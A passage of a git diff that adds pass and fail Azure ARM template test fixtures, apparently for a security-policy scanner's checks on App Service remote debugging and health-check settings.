+      "html": "https://github.com/Azure-Samples/html-docs-hello-world"
+    },
+    "gitRepoUrl": "[if(bool(parameters('helloWorld')), variables('gitRepoReference')[toLower(parameters('language'))], parameters('repoUrl'))]",
+    "configReference": {
+      ".net": {
+        "comments": ".Net app. No additional configuration needed."
+      },
+      "html": {
+        "comments": "HTML app. No additional configuration needed."
+      },
+      "php": {
+        "phpVersion": "7.4"
+      },
+      "node": {
+        "appSettings": [
+          {
+            "name": "WEBSITE_NODE_DEFAULT_VERSION",
+            "value": "12.15.0"
+          }
+        ]
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2022-09-01",
+      "name": "unknown",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "string"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "unknown",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/fail.json b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/fail.json
new file mode 100644
index 00000000000..26100716400
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/fail.json
@@ -0,0 +1,77 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue" : "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku":{
+      "type": "string",
+      "defaultValue" : "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion" : {
+      "type": "string",
+      "defaultValue" : "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/serverfarms",
+      "apiVersion": "2018-02-01",
+      "name": "[variables('appServicePlanName')]",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('sku')]"
+      },
+      "kind": "linux",
+      "properties":{
+        "reserved":true
+      }
+    },
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2018-11-01",
+      "name": "fail",
+      "location": "[parameters('location')]",
+      "kind": "app,linux",
+      "dependsOn": [
+        "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]"
+      ],
+      "identity": {
+        "type": "SystemAssigned"
+      },
+      "properties": {
+         "reserved": true,
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]",
+        "siteConfig": {
+          "linuxFxVersion": "[parameters('linuxFxVersion')]",
+          "http20Enabled": "true",
+          "minTlsVersion": "1.2",
+          "remoteDebuggingEnabled": true
+        },
+        "clientCertEnabled": true
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass.json b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass.json
new file mode 100644
index 00000000000..5e2c3318c72
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass.json
@@ -0,0 +1,77 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue" : "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku":{
+      "type": "string",
+      "defaultValue" : "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion" : {
+      "type": "string",
+      "defaultValue" : "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/serverfarms",
+      "apiVersion": "2018-02-01",
+      "name": "[variables('appServicePlanName')]",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('sku')]"
+      },
+      "kind": "linux",
+      "properties":{
+        "reserved":true
+      }
+    },
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2018-11-01",
+      "name": "pass",
+      "location": "[parameters('location')]",
+      "kind": "app,linux",
+      "dependsOn": [
+        "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]"
+      ],
+      "identity": {
+        "type": "SystemAssigned"
+      },
+      "properties": {
+         "reserved": true,
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]",
+        "siteConfig": {
+          "linuxFxVersion": "[parameters('linuxFxVersion')]",
+          "http20Enabled": "true",
+          "minTlsVersion": "1.2",
+          "remoteDebuggingEnabled": false
+        },
+        "clientCertEnabled": true
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass1.json b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass1.json
new file mode 100644
index 00000000000..f36cba465a0
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass1.json
@@ -0,0 +1,76 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue" : "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku":{
+      "type": "string",
+      "defaultValue" : "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion" : {
+      "type": "string",
+      "defaultValue" : "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/serverfarms",
+      "apiVersion": "2018-02-01",
+      "name": "[variables('appServicePlanName')]",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('sku')]"
+      },
+      "kind": "linux",
+      "properties":{
+        "reserved":true
+      }
+    },
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2018-11-01",
+      "name": "pass1",
+      "location": "[parameters('location')]",
+      "kind": "app,linux",
+      "dependsOn": [
+        "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]"
+      ],
+      "identity": {
+        "type": "SystemAssigned"
+      },
+      "properties": {
+         "reserved": true,
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]",
+        "siteConfig": {
+          "linuxFxVersion": "[parameters('linuxFxVersion')]",
+          "http20Enabled": "true",
+          "minTlsVersion": "1.2"
+        },
+        "clientCertEnabled": true
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceSetHealthCheck/fail.json b/tests/arm/checks/resource/example_AppServiceSetHealthCheck/fail.json
new file mode 100644
index 00000000000..12a4acbb49a
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceSetHealthCheck/fail.json
@@ -0,0 +1,329 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2022-09-01",
+      "name": "fail",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": true,
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "is try string to app service disallow cors"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": false,
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceSetHealthCheck/fail2.json b/tests/arm/checks/resource/example_AppServiceSetHealthCheck/fail2.json
new file mode 100644
index 00000000000..f8f21267134
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceSetHealthCheck/fail2.json
@@ -0,0 +1,329 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/slots",
+      "apiVersion": "2022-09-01",
+      "name": "fail2",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "string"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
